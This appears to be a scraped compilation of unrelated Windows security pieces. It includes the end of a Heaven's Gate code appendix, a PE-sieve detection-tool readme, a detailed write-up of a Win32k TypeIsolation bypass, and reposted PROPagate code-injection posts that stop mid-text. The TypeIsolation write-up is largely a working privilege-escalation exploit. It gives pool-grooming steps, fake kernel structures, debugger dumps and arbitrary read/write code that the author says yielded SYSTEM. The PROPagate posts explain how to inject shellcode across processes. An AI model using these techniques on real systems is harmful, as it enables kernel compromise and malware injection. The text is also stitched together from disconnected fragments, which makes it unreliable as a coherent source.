if (!ErrorCaseTable)
{
ErrorCaseTable = &ServiceTables[LogService->ServiceTable].ErrorCaseDefault;
}
ErrorCase = ErrorCaseTable[LogService->ServiceNumber].ErrorCase;
TransformedStatus = ErrorCaseTable[LogService->ServiceNumber].TransformedStatus;
switch (ErrorCase)
{
case 0:
return ExceptionStatus;
case 1:
NtCurrentTeb()->LastErrorValue = RtlNtStatusToDosError(ExceptionStatus);
return ExceptionStatus;
case 2:
return TransformedStatus;
case 3:
NtCurrentTeb()->LastErrorValue = RtlNtStatusToDosError(ExceptionStatus);
return TransformedStatus;
default:
return STATUS_INVALID_PARAMETER;
}
}
view raw2_appendix.h hosted with ❤ by GitHub

References

How does one retrieve the 32-bit context of a Wow64 program from a 64-bit process on Windows Server 2003 x64?
http://www.nynaeve.net/?p=191

Mixing x86 with x64 code
http://blog.rewolf.pl/blog/?p=102

Windows 10 on ARM
https://channel9.msdn.com/Events/Build/2017/P4171

Knockin’ on Heaven’s Gate – Dynamic Processor Mode Switching
http://rce.co/knockin-on-heavens-gate-dynamic-processor-mode-switching/

Closing “Heaven’s Gate”
http://www.alex-ionescu.com/?p=300

PE-sieve is a light-weight tool that helps to detect malware running on the system

PE-sieve

PE-sieve is a light-weight tool that helps to detect malware running on the system, as well as to collect the potentially malicious material for further analysis. Recognizes and dumps variety of implants within the scanned process: replaced/injected PEs, shellcodes, hooks, and other in-memory patches.
Detects inline hooks, Process Hollowing, Process Doppelgänging, Reflective DLL Injection, etc.

uses library: https://github.com/hasherezade/libpeconv.git

Clone:

Use recursive clone to get the repo together with the submodule:

git clone --recursive https://github.com/hasherezade/pe-sieve.git

Latest builds*:

*those builds are available for testing and they may be ahead of the official release:

example: classic unmapping (2) vs remapping (3) — with remapping full virtual content of the section is preserved, so it helps i.e. if the full section was unpacked in memory, or if virtual caves were used


logo by Baran Pirinçal

Save and Reborn GDI data-only attack from Win32k TypeIsolation

1 Background

In recent years, the exploit of GDI objects to complete arbitrary memory address R/W in kernel exploitation has become more and more useful. In many types of vulnerabilityes such as pool overflow, arbitrary writes, and out-of-bound write, use after free and double free, you can use GDI objects to read and write arbitrary memory. We call this GDI data-only attack.

Microsoft introduced the win32k type isolation after the Windows 10 build 1709 release to mitigate GDI data-only attack in kernel exploitation. I discovered a mistake in Win32k TypeIsolation when I reverse win32kbase.sys. It have resulted GDI data-only attack worked again in certain common vulnerabilities. In this paper, I will share this new attack scenario.

Debug environment:

OS:

Windows 10 rs3 16299.371

FILE:

Win32kbase.sys 10.0.16299.371

2 GDI data-only attack

GDI data-only attack is one of the common methods which used in kernel exploitation. Modify GDI object member-variables by common vulnerabilities, you can use the GDI API in win32k to complete arbitrary memory read and write. At present, two GDI objects commonly used in GDI data-only attacks are Bitmap and Palette. An important structure of Bitmap is:


Typedef struct _SURFOBJ {

DHSURF dhsurf;

HSURF hsurf;

DHPDEV dhpdev;

HDEV hdev;

SIZEL sizlBitmap;

ULONG cjBits;

PVOID pvBits;

PVOID pvScan0;

LONG lDelta;

ULONG iUniq;

ULONG iBitmapFormat;

USHORT iType;

USHORT fjBitmap;

} SURFOBJ, *PSURFOBJ;

An important structure of Palette is:


Typedef struct _PALETTE64

{

BASEOBJECT64 BaseObject;

FLONG flPal;

ULONG32 cEntries;

ULONG32 ulTime;

HDC hdcHead;

ULONG64 hSelected;

ULONG64 cRefhpal;

ULONG64 cRefRegular;

ULONG64 ptransFore;

ULONG64 ptransCurrent;

ULONG64 ptransOld;

ULONG32 unk_038;

ULONG64 pfnGetNearest;

ULONG64 pfnGetMatch;

ULONG64 ulRGBTime;

ULONG64 pRGBXlate;

PALETTEENTRY *pFirstColor;

Struct _PALETTE *ppalThis;

PALETTEENTRY apalColors[3];

}

In the kernel structure of Bitmap and Palette, two important member-variables related to GDI data-only attack are Bitmap->pvScan0 and Palette->pFirstColor. Two member-variables point to Bitmap and Palette’s data field, and you can read or write data from data field through the GDI APIs. As long as we modify two member-variables to any memory address by triggering a vulnerability, we can use GetBitmapBits/SetBitmapBits or GetPaletteEntries/SetPaletteEntries to read and write arbitrary memory address.

About using the Bitmap and Palette to complete the GDI data-only attack Now that there are many related technical papers on the Internet, and it is not the focus of this paper, there will be no more deeply sharing. The relevant information can refer to the fifth part.

3 Win32k TypeIsolation

The exploit of GDI data-only attack greatly reduces the difficulty of kernel exploitation and can be used in most common types of vulnerabilities. Microsoft has added a new mitigation after Windows 10 rs3 build 1709 —- Win32k Typeisolation, which manages the GDI objects through a doubly-linked list, and separates the head of the GDI object from the data field. This is not only mitigate the exploit of pool fengshui which create a predictable pool and uses a GDI object to occupy the pool hole and modify member-variables by vulnerabilities. but also mitigate attack scenario which modifies other member-variables of GDI object header to increase the controllable range of the data field, because the head and data field is no longer adjacent.

About win32k typeisolation mechanism can refer to the following figure:

Here I will explain the important parts of the mechanism of win32k typeisolation. The detailed operation mechanism of win32k typeisolation, including the allocation, and release of GDI object, can be referred to in the fifth part.

In win32k typeisolation, GDI object is managed uniformly through the CSectionEntry doubly linked list. The view field points to a 0x28000 memory space, and the head of the GDI object is managed here. The view field is managed by view array, and the array size is 0x1000. When assigning to a GDI object, RTL_BITMAP is used as an important basis for assigning a GDI object to a specified view field.

In CSectionEntry, bitmap_allocator points to CSectionBitmapAllocator, and xored_view, xor_key, xored_rtl_bitmap are stored in CSectionBitmapAllocator, where xored_view ^ xor_key points to the view field and xored_rtl_btimap ^ xor_key points to RTL_BITMAP.

In RTL_BITMAP, bitmap_buffer_ptr points to BitmapBuffer,and BitmapBuffer is used to record the status of the view field, which is 0 for idle and 1 for in use. When applying for a GDI object, it starts traversing the CSectionEntry list through win32kbase!gpTypeIsolation and checks whether the current view field contains a free memory by CSectionBitmapAllocator. If there is a free memory, a new GDI object header will be placed in the view field.

I did some research in the reverse engineering of the implementation of GDI object allocation and release about the CTypeIsolation class and the CSectionEntry class, and then I found a mistake. TypeIsolation traverses the CSectionEntry doubly linked list, uses the CSectionBitmapAllocator to determine the state of the view field, and manages the GDI object SURFACE which stored in the view field, but does not check the validity of CSectionEntry->view and CSectionEntry->bitmap_allocator pointers, that is to say if we can construct a fake view and fake bitmap_allocator, and we can use the vulnerability to modify CSectionEntry->view and CSectionEntry->bitmap_allocator to point to fake struct, we can re-use GDI object to complete the data-only attack.

4 Save and reborn gdi data-only attack!

In this section, I would like to share the idea of ​​this attack scenario. HEVD is a practice driver developed by Hacksysteam that has typical kernel vulnerabilities. There is an Arbitrary Write vulnerability in HEVD. We use this vulnerability as example to share my attack scenario.

Attack scenario:

First look at the allocation of CSectionEntry, CSectionEntry will allocate 0x40 size session paged pool, CSectionEntry allocate pool memory implementation in NSInstrumentation::CSectionEntry::Create().


.text:00000001C002AC8A mov edx, 20h ; NumberOfBytes

.text:00000001C002AC8F mov r8d, 6F736955h ; Tag

.text:00000001C002AC95 lea ecx, [rdx+1] ; PoolType

.text:00000001C002AC98 call cs:__imp_ExAllocatePoolWithTag //Allocate 0x40 session paged pool

In other words, we can still use the pool fengshui to create a predictable session paged pool hole and it will be occupied with CSectionEntry. Therefore, in the exploit scenario of HEVD Arbitrary write, we use the tagWND to create a stable pool hole. , and use the HMValidateHandle to leak tagWND kernel object address. Because the current vulnerability instance is an arbitrary write vulnerability, if we can reveal the address of the kernel object, it will facilitate our understanding of this attack scenario, of course, in many attack scenarios, we only need to use pool fengshui to create a predictable pool.


Kd> g//make a stable pool hole by using tagWND

Break instruction exception - code 80000003 (first chance)

0033:00007ff6`89a61829 cc int 3

Kd> p

0033:00007ff6`89a6182a 488b842410010000 mov rax,qword ptr [rsp+110h]

Kd> p

0033:00007ff6`89a61832 4839842400010000 cmp qword ptr [rsp+100h],rax

Kd> r rax

Rax=ffff862e827ca220

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free ) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Allocated) *Ustx Process: ffffd40acb28c580

Pooltag Ustx : USERTAG_TEXT, Binary : win32k!NtUserDrawCaptionTemp

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8

Ffff862e827ca330 size: e0 previous size: e0 (Allocated) Gla8```

0xffff862e827ca220 is a stable session paged pool hole, and 0xffff862e827ca220 will be released later, in a free state.


Kd> p

0033:00007ff7`abc21787 488b842498000000 mov rax,qword ptr [rsp+98h]

Kd> p

0033:00007ff7`abc2178f 48398424a0000000 cmp qword ptr [rsp+0A0h],rax

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Free ) *Ustx

Pooltag Ustx : USERTAG_TEXT, Binary : win32k!NtUserDrawCaptionTemp

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8

Ffff862e827ca330 size: e0 previous size: e0 (Allocated) Gla8

Now we need to create the CSecitionEntry to occupy 0xffff862e827ca220. This requires the use of a feature of TypeIsolation. As mentioned in the second section, when the GDI object is requested, it will traverse the CSectionEntry and determine whether there is any free in the view field, if the view field of the CSectionEntry is full, the traversal will continue to the next CSectionEntry, but if CTypeIsolation doubly linked list, all the view fields of the CSectionEntrys are full, then NSInstrumentation::CSectionEntry::Create is invoked to create a new CSectionEntry.

Therefore, we allocate a large number of GDI objects after we have finished creating the pool hole to fill up all the CSectionEntry’s view fields to ensure that a new CSectionEntry is created and occupy a pool hole of size 0x40.


Kd> g//create a large number of GDI objects, 0xffff862e827ca220 is occupied by CSectionEntry

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Allocated) *Uiso

Pooltag Uiso : USERTAG_ISOHEAP, Binary : win32k!TypeIsolation::Create

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8 ffff86b442563150 size:

Next we need to construct the fake CSectionEntry->view and fake CSectionEntry->bitmap_allocator and use the Arbitrary Write to modify the member-variable pointer in the CSectionEntry in the session paged pool hole to point to the fake struct we constructed.

The view field of the new CSectionEntry that was created when we allocate a large number of GDI objects may already be full or partially full by SURFACEs. If we construct the fake struct to construct the view field as empty, then we can deceive TypeIsolation that GDI object will place SURFACE in a known location.

We use VirtualAllocEx to allocate the memory in the userspace to store the fake struct, and we set the userspace memory property to READWRITE.


Kd> dq 1e0000//fake pushlock

00000000`001e0000 00000000`00000000 00000000`0000006c

Kd> dq 1f0000//fake view

00000000`001f0000 00000000`00000000 00000000`00000000

00000000`001f0010 00000000`00000000 00000000`00000000

Kd> dq 190000//fake RTL_BITMAP

00000000`00190000 00000000`000000f0 00000000`00190010

00000000`00190010 00000000`00000000 00000000`00000000

Kd> dq 1c0000//fake CSectionBitmapAllocator

00000000`001c0000 00000000`001e0000 deadbeef`deb2b33f

00000000`001c0010 deadbeef`deadb33f deadbeef`deb4b33f

00000000`001c0020 00000001`00000001 00000001`00000000

Among them, 0x1f0000 points to the view field, 0x1c0000 points to CSectionBitmapAllocator, and the fake view field is used to store the GDI object. The structure of CSectionBitmapAllocator needs thoughtful construction because we need to use it to deceive the typeisolation that the CSectionEntry we control is a free view item.


Typedef struct _CSECTIONBITMAPALLOCATOR {

PVOID pushlock; // + 0x00

ULONG64 xored_view; // + 0x08

ULONG64 xor_key; // + 0x10

ULONG64 xored_rtl_bitmap; // + 0x18

ULONG bitmap_hint_index; // + 0x20

ULONG num_commited_views; // + 0x24

} CSECTIONBITMAPALLOCATOR, *PCSECTIONBITMAPALLOCATOR;

The above CSectionBitmapAllocator structure compares with 0x1c0000 structure, and I defined xor_key as 0xdeadbeefdeadb33f, as long as the xor_key ^ xor_view and xor_key ^ xor_rtl_bitmap operation point to the view field and RTL_BITMAP. In the debugging I found that the pushlock must point to a valid structure pointer, otherwise it will trigger BUGCHECK, so I allocate memory 0x1e0000 to store pushlock content.

As described in the second section, bitmap_hint_index is used as a condition to quickly index in the RTL_BITMAP, so this value also needs to be set to 0x00 to indicate the index in RTL_BITMAP. In the same way we look at the structure of RTL_BITMAP.


Typedef struct _RTL_BITMAP {

ULONG64 size; // + 0x00

PVOID bitmap_buffer; // + 0x08

} RTL_BITMAP, *PRTL_BITMAP;

Kd> dyb fffff322401b90b0

76543210 76543210 76543210 76543210

-------- -------- -------- --------

Fffff322`401b90b0 11110000 00000000 00000000 00000000 f0 00 00 00

Fffff322`401b90b4 00000000 00000000 00000000 00000000 00 00 00 00

Fffff322`401b90b8 11000000 10010000 00011011 01000000 c0 90 1b 40

Fffff322`401b90bc 00100010 11110011 11111111 11111111 22 f3 ff ff

Fffff322`401b90c0 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90c4 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90c8 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90cc 11111111 11111111 11111111 11111111 ff ff ff ff

Kd> dq fffff322401b90b0

Fffff322`401b90b0 00000000`000000f0 fffff322`401b90c0//ptr to rtl_bitmap buffer

Fffff322`401b90c0 ffffffff`ffffffff ffffffff`ffffffff

Fffff322`401b90d0 ffffffff`ffffffff

Here I select a valid RTL_BITMAP as a template, where the first member-variable represents the RTL_BITMAP size, the second member-variable points to the bitmap_buffer, and the immediately adjacent bitmap_buffer represents the state of the view field in bits. To deceive typeisolation, we will all of them are set to 0, indicating that the view field of the current CSectionEntry item is all idle, referring to the 0x190000 fake RTL_BITMAP structure.

Next, we only need to modify the CSectionEntry view and CSectionBitmapAllocator pointer through the HEVD’s Arbitrary write vulnerability.


Kd> dq ffff862e827ca220//before trigger

Ffff862e`827ca220 ffff862e`827cf4f0 ffff862e`827ef300

Ffff862e`827ca230 ffffc383`08613880 ffff862e`84780000

Ffff862e`827ca240 ffff862e`827f33c0 00000000`00000000

Kd> g / / trigger vulnerability, CSectionEntry-> view and CSectionEntry-> bitmap_allocator is modified

Break instruction exception - code 80000003 (first chance)

0033:00007ff7`abc21e35 cc int 3

Kd> dq ffff862e827ca220

Ffff862e`827ca220 ffff862e`827cf4f0 ffff862e`827ef300

Ffff862e`827ca230 ffffc383`08613880 00000000`001f0000

Ffff862e`827ca240 00000000`001c0000 00000000`00000000

Next, we normally allocate a GDI object, call CreateBitmap to create a bitmap object, and then observe the state of the view field.


Kd> g

Break instruction exception - code 80000003 (first chance)

0033:00007ff7`abc21ec8 cc int 3

Kd> dq 1f0280

00000000`001f0280 00000000`00051a2e 00000000`00000000

00000000`001f0290 ffffd40a`cc9fd700 00000000`00000000

00000000`001f02a0 00000000`00051a2e 00000000`00000000

00000000`001f02b0 00000000`00000000 00000002`00000040

00000000`001f02c0 00000000`00000080 ffff862e`8277da30

00000000`001f02d0 ffff862e`8277da30 00003f02`00000040

00000000`001f02e0 00010000`00000003 00000000`00000000

00000000`001f02f0 00000000`04800200 00000000`00000000

You can see that the bitmap kernel object is placed in the fake view field. We can read the bitmap kernel object directly from the userspace. Next, we only need to directly modify the pvScan0 of the bitmap kernel object stored in the userspace, and then call the GetBitmapBits/SetBitmapBits to complete any memory address read and write.

Summarize the exploit process:

Fix for full exploit:

In the course of completing the exploit, I discovered that BSOD was generated some time, which greatly reduced the stability of the GDI data-only attack. For example,


Kd> !analyze -v

************************************************** *****************************

* *

* Bugcheck Analysis *

* *

************************************************** *****************************




SYSTEM_SERVICE_EXCEPTION (3b)

An exception happened while performing a system service routine.

Arguments:

Arg1: 00000000c0000005, Exception code that caused the bugcheck

Arg2: ffffd7d895bd9847, Address of the instruction which caused the bugcheck

Arg3: ffff8c8f89e98cf0, Address of the context record for the exception that caused the bugcheck

Arg4: 0000000000000000, zero.




Debugging Details:

------------------







OVERLAPPED_MODULE: Address regions for 'dxgmms1' and 'dump_storport.sys' overlap




EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - 0x%08lx




FAULTING_IP:

Win32kbase!NSInstrumentation::CTypeIsolation&lt;163840,640>::AllocateType+47

Ffffd7d8`95bd9847 488b1e mov rbx, qword ptr [rsi]




CONTEXT: ffff8c8f89e98cf0 -- (.cxr 0xffff8c8f89e98cf0)

.cxr 0xffff8c8f89e98cf0

Rax=ffffdb0039e7c080 rbx=ffffd7a7424e4e00 rcx=ffffdb0039e7c080

Rdx=ffffd7a7424e4e00 rsi=00000000001e0000 rdi=ffffd7a740000660

Rip=ffffd7d895bd9847 rsp=ffff8c8f89e996e0 rbp=0000000000000000

R8=ffff8c8f89e996b8 r9=0000000000000001 r10=7ffffffffffffffc

R11=0000000000000027 r12=00000000000000ea r13=ffffd7a740000680

R14=ffffd7a7424dca70 r15=0000000000000027

Iopl=0 nv up ei pl nz na po nc

Cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010206

Win32kbase!NSInstrumentation::CTypeIsolation&lt;163840,640>::AllocateType+0x47:

Ffffd7d8`95bd9847 488b1e mov rbx, qword ptr [rsi] ds:002b:00000000`001e0000=????????????????

After many tracking, I discovered that the main reason for BSOD is that the fake struct we created when using VirtualAllocEx is located in the process space of our current process. This space is not shared by other processes, that is, if we modify the view field through a vulnerability. After the pointer to the CSectionBitmapAllocator, when other processes create the GDI object, it will also traverse the CSecitionEntry. When traversing to the CSectionEntry we modify through the vulnerability, it will generate BSoD because the address space of the process is invalid, so here I did my first fix when the vulnerability was triggered finish.


DWORD64 fix_bitmapbits1 = 0xffffffffffffffff;

DWORD64 fix_bitmapbits2 = 0xffffffffffff;

DWORD64 fix_number = 0x2800000000;

CopyMemory((void *)(fakertl_bitmap + 0x10), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x18), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x20), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x28), &fix_bitmapbits2, 0x8);

CopyMemory((void *)(fakeallocator + 0x20), &fix_number, 0x8);

In the first fix, I modified the bitmap_hint_index and the rtl_bitmap to deceive the typeisolation when traverse the CSectionEntry and think that the view field of the fake CSectionEntry is currently full and will skip this CSectionEntry.

We know that the current CSectionEntry has been modified by us, so even if we end the exploit exit process, the CSectionEntry will still be part of the CTypeIsolation doubly linked list, and when our process exits, The current process space allocated by VirtualAllocEx will be released. This will lead to a lot of unknown errors. We have already had the ability to read and write at any address. So I did my second fix.


ArbitraryRead(bitmap, fakeview + 0x280 + 0x48, CSectionEntryKernelAddress + 0x8, (BYTE *)&CSectionPrevious, sizeof(DWORD64));

ArbitraryRead(bitmap, fakeview + 0x280 + 0x48, CSectionEntryKernelAddress, (BYTE *)&CSectionNext, sizeof(DWORD64));

LogMessage(L_INFO, L"Current CSectionEntry->previous: 0x%p", CSePrevious);

LogMessage(L_INFO, L"Current CSectionEntry->next: 0x%p", CSectionNext);

ArbitraryWrite(bitmap, fakeview + 0x280 + 0x48, CSectionNext + 0x8, (BYTE *)&CSectionPrevious, sizeof(DWORD64));

ArbitraryWrite(bitmap, fakeview + 0x280 + 0x48, CSectionPrevious, (BYTE *)&CSectionNext, sizeof(DWORD64));

In the second fix, I obtained CSectionEntry->previous and CSectionEntry->next, which unlinks the current CSectionEntry so that when the GDI object allocates traversal CSectionEntry, it will  deal with fake CSectionEntry no longer.

After completing the two fixes, you can successfully use GDI data-only attack to complete any memory address read and write. Here, I directly obtained the SYSTEM permissions for the latest version of Windows10 rs3, but once again when the process completely exits, it triggers BSoD. After the analysis, I found that this BSoD is due to the unlink after, the GDI handle is still stored in the GDI handle table, then it will find the corresponding kernel object in CSectionEntry and free away, and we store the bitmap kernel object CSectionEntry has been unlink, Caused the occurrence of BSoD.

The problem occurs in NtGdiCloseProcess, which is responsible for releasing the GDI object of the current process. The call chain associated with SURFACE is as follows


0e ffff858c`8ef77300 ffff842e`52a57244 win32kbase!SURFACE::bDeleteSurface+0x7ef

0f ffff858c`8ef774d0 ffff842e`52a1303f win32kbase!SURFREF::bDeleteSurface+0x14

10 ffff858c`8ef77500 ffff842e`52a0cbef win32kbase!vCleanupSurfaces+0x87

11 ffff858c`8ef77530 ffff842e`52a0c804 win32kbase!NtGdiCloseProcess+0x11f

bDeleteSurface is responsible for releasing the SURFACE kernel object in the GDI handle table. We need to find the HBITMAP which stored in the fake view in the GDI handle table, and set it to 0x0. This will skip the subsequent free processing in bDeleteSurface. Then call HmgNextOwned to release the next GDI object. The key code for finding the location of HBITMAP in the GDI handle table is in HmgSharedLockCheck. The key code is as follows:


V4 = *(_QWORD *)(*(_QWORD *)(**(_QWORD **)(v10 + 24) + 8 *((unsigned __int64)(unsigned int)v6 >> 8)) + 16i64 * (unsigned __int8 )v6 + 8);

Here I have restored a complete calculation method to find the bitmap object:


*(*(*(*(*win32kbase!gpHandleManager+10)+8)+18)+(hbitmap&0xffff>>8)*8)+hbitmap&0xff*2*8

It is worth mentioning here is the need to leak the base address of win32kbase.sys, in the case of Low IL, we need vulnerability to leak info. And I use NtQuerySystemInformation in Medium IL to leak win32kbase.sys base address to calculate the gpHandleManager address, after Find the position of the target bitmap object in the GDI handle table in the fake view, and set it to 0x0. Finally complete the full exploit.

Now that the exploit of the kernel is getting harder and harder, a full exploitation often requires the support of other vulnerabilities, such as the info leak. Compared to the oob writes, uaf, double free, and write-what-where, the pool overflow is more complicated with this scenario, because it involves CSectionEntry->previous and CSectionEntry->next problems, but it is not impossible to use this scenario in pool overflow.

If you have any questions, welcome to discuss with me. Thank you!

5 Reference

https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives

https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/5A1F/DEFCON-25-5A1F-Demystifying-Kernel-Exploitation-By-Abusing-GDI-Objects.pdf

https://blog.quarkslab.com/reverse-engineering-the-win32k-type-isolation-mitigation.html

https://github.com/sam-b/windows_kernel_address_leaks

New code injection trick named — PROPagate code injection technique

ROPagate code injection technique

@Hexacorn discussed in late 2017 a new code injection technique, which involves hooking existing callback functions in a Window subclass structure. Exploiting this legitimate functionality of windows for malicious purposes will not likely surprise some developers already familiar with hooking existing callback functions in a process. However, it’s still a relatively new technique for many to misuse for code injection, and we’ll likely see it used more and more in future.

For all the details on research conducted by Adam, I suggest the following posts.

 

PROPagate — a new code injection trick

|=======================================================|

Executing code inside a different process space is typically achieved via an injected DLL /system-wide hooks, sideloading, etc./, executing remote threads, APCs, intercepting and modifying the thread context of remote threads, etc. Then there is Gapz/Powerloader code injection (a.k.a. EWMI), AtomBombing, and mapping/unmapping trick with the NtClose patch.

There is one more.

Remember Shatter attacks?

I believe that Gapz trick was created as an attempt to bypass what has been mitigated by the User Interface Privilege Isolation (UIPI). Interestingly, there is actually more than one way to do it, and the trick that I am going to describe below is a much cleaner variant of it – it doesn’t even need any ROP.

There is a class of windows always present on the system that use window subclassing. Window subclassing is just a fancy name for hooking, because during the subclassing process an old window procedure is preserved while the new one is being assigned to the window. The new one then intercepts all the window messages, does whatever it has to do, and then calls the old one.

The ‘native’ window subclassing is done using the SetWindowSubclass API.

When a window is subclassed it gains a new property stored inside its internal structures and with a name depending on a version of comctl32.dll:

  • UxSubclassInfo – version 6.x
  • CC32SubclassInfo – version 5.x

Looking at properties of Windows Explorer child windows we can see that plenty of them use this particular subclassing property:

So do other Windows applications – pretty much any program that is leveraging standard windows controls can be of interest, including say… OllyDbg:When the SetWindowSubclass is called it is using SetProp API to set one of these two properties (UxSubclassInfo, or CC32SubclassInfo) to point to an area in memory where the old function pointer will be stored. When the new message routine is called, it will then call GetProp API for the given window and once its old procedure address is retrieved – it is executed.

Coming back for a moment to the aforementioned shattering attacks. We can’t use SetWindowLong or SetClassLong (or their newer SetWindowLongPtr and SetClassLongPtr alternatives) any longer to set the address of the window procedure for windows belonging to the other processes (via GWL_WNDPROC or GCL_WNDPROC). However, the SetProp function is not affected by this limitation. When it comes to the process at the lower of equal  integrity level the Microsoft documentation says:

SetProp is subject to the restrictions of User Interface Privilege Isolation (UIPI). A process can only call this function on a window belonging to a process of lesser or equal integrity level. When UIPI blocks property changes, GetLastError will return 5.

So, if we talk about other user applications in the same session – there is plenty of them and we can modify their windows’ properties freely!

I guess you know by now where it is heading:

  • We can freely modify the property of a window belonging to another process.
  • We also know some properties point to memory region that store an old address of a procedure of the subclassed window.
  • The routine that address points to will be at some stage executed.

All we need is a structure that UxSubclassInfo/CC32SubclassInfo properties are using. This is actually pretty easy – you can check what SetProp is doing for these subclassed windows. You will quickly realize that the old procedure is stored at the offset 0x14 from the beginning of that memory region (the structure is a bit more complex as it may contain a number of callbacks, but the first one is at 0x14).

So, injecting a small buffer into a target process, ensuring the expected structure is properly filled-in and and pointing to the payload and then changing the respective window property will ensure the payload is executed next time the message is received by the window (this can be enforced by sending a message).

When I discovered it, I wrote a quick & dirty POC that enumerates all windows with the aforementioned properties (there is lots of them so pretty much every GUI application is affected). For each subclassing property found I changed it to a random value – as a result Windows Explorer, Total Commander, Process Hacker, Ollydbg, and a few more applications crashed immediately. That was a good sign. I then created a very small shellcode that shows a Message Box on a desktop window and tested it on Windows 10 (under normal account).

The moment when the shellcode is being called in a first random target (here, Total Commander):

Of course, it also works in Windows Explorer, this is how it looks like when executed:


If we check with Process Explorer, we can see the window belongs to explorer.exe:Testing it on a good ol’ Windows XP and injecting the shellcode into Windows Explorer shows a nice cascade of executed shellcodes for each window exposing the subclassing property (in terms of special effects XP always beats Windows 10 – the latter freezes after first messagebox shows up; and in case you are wondering why it freezes – it’s because my shellcode is simple and once executed it is basically damaging the running application):

For obvious reasons I won’t be attaching the source code.

If you are an EDR or sandboxing vendor you should consider monitoring SetProp/SetWindowSubclass APIs as well as their NT alternatives and system services.

And…

This is not the end. There are many other generic properties that can be potentially leveraged in a very same way:

  • The Microsoft Foundation Class Library (MFC) uses ‘AfxOldWndProc423’ property to subclass its windows
  • ControlOfs[HEX] – properties associated with Delphi applications reference in-memory Visual Component Library (VCL) objects
  • New windows framework e.g. Microsoft.Windows.WindowFactory.* needs more research
  • A number of custom controls use ‘subclass’ and I bet they can be modified in a similar way
  • Some properties expose COM/OLE Interfaces e.g. OleDropTargetInterface

If you are curious if it works between 32- and 64- bit processes

|=======================================================|

 

PROPagate follow-up — Some more Shattering Attack Potentials

|=======================================================|

We now know that one can use SetProp to execute a shellcode inside 32- and 64-bit applications as long as they use windows that are subclassed.

=========================================================

A new trick that allows to execute code in other processes without using remote threads, APC, etc. While describing it, I focused only on 32-bit architecture. One may wonder whether there is a way for it to work on 64-bit systems and even more interestingly – whether there is a possibility to inject/run code between 32- and 64- bit processes.

To test it, I checked my 32-bit code injector on a 64-bit box. It crashed my 64-bit Explorer.exe process in no time.

So, yes, we can change properties of windows belonging to 64-bit processes from a 32-bit process! And yes, you can swap the subclass properties I described previously to point to your injected buffer and eventually make the payload execute! The reason it works is that original property addresses are stored in lower 32-bit of the 64-bit offset. Replacing that lower 32-bit part of the offset to point to a newly allocated buffer (also in lower area of the memory, thanks to VirtualAllocEx) is enough to trigger the code execution.

See below the GetProp inside explorer.exe retrieving the subclassed property:

So, there you have it… 32 process injecting into 64-bit process and executing the payload w/o heaven’s gate or using other undocumented tricks.

The below is the moment the 64-bit shellcode is executed:

p.s. the structure of the subclassed callbacks is slightly different inside 64-bit processes due to 64-bit offsets, but again, I don’t want to make it any easier to bad guys than it should be 🙂

=========================================================

There are more possibilities.

While SetWindowLong/SetWindowLongPtr/SetClassLong/SetClassLongPtr are all protected and can be only used on windows belonging to the same process, the very old APIs SetWindowWord and SetClassWord … are not.

As usual, I tested it enumerating windows running a 32-bit application on a 64-bit system and setting properties to unpredictable values and observing what happens.

It turns out that again, pretty much all my Window applications crashed on Window 10. These 16 bits seem to be quite powerful…

I am not a vulnerability researcher, but I bet we can still do something interesting; I will continue poking around. The easy wins I see are similar to SetProp e.g. GWL_USERDATA may point to some virtual tables/pointers; the DWL_USER – as per Microsoft – ‘sets new extra information that is private to the application, such as handles or pointers’. Assuming that we may only modify 16 bit of e.g. some offset, redirecting it to some code cave or overwriting unused part of memory within close proximity of the original offset could allow for a successful exploit.

|=======================================================|

 

PROPagate follow-up #2 — Some more Shattering Attack Potentials

|=======================================================|

A few months back I discovered a new code injection technique that I named PROPagate. Using a subclass of a well-known shatter attack one can modify the callback function pointers inside other processes by using Windows APIs like SetProp, and potentially others. After pointing out a few ideas I put it on a back burner for a while, but I knew I will want to explore some more possibilities in the future.

In particular, I was curious what are the chances one could force the remote process to indirectly call the ‘prohibited’ functions like SetWindowLong, SetClassLong (or their newer alternatives SetWindowLongPtr and SetClassLongPtr), but with the arguments that we control (i.e. from a remote process). These API are ‘prohibited’ because they can only be called in a context of a process that owns them, so we can’t directly call them and target windows that belong to other processes.

It turns out his may be possible!

If there is one common way of using the SetWindowLong API it is to set up pointers, and/or filling-in window-specific memory areas (allocated per window instance) with some values that are initialized immediately after the window is created. The same thing happens when the window is destroyed – during the latter these memory areas are usually freed and set to zeroes, and callbacks are discarded.

These two actions are associated with two very specific window messages:

  • WM_NCCREATE
  • WM_NCDESTROY

In fact, many ‘native’ windows kick off their existence by setting some callbacks in their message handling routines during processing of these two messages.

With that in mind, I started looking at existing processes and got some interesting findings. Here is a snippet of a routine I found inside Windows Explorer that could be potentially abused by a remote process:

Or, it’s disassembly equivalent (in response to WM_NCCREATE message):

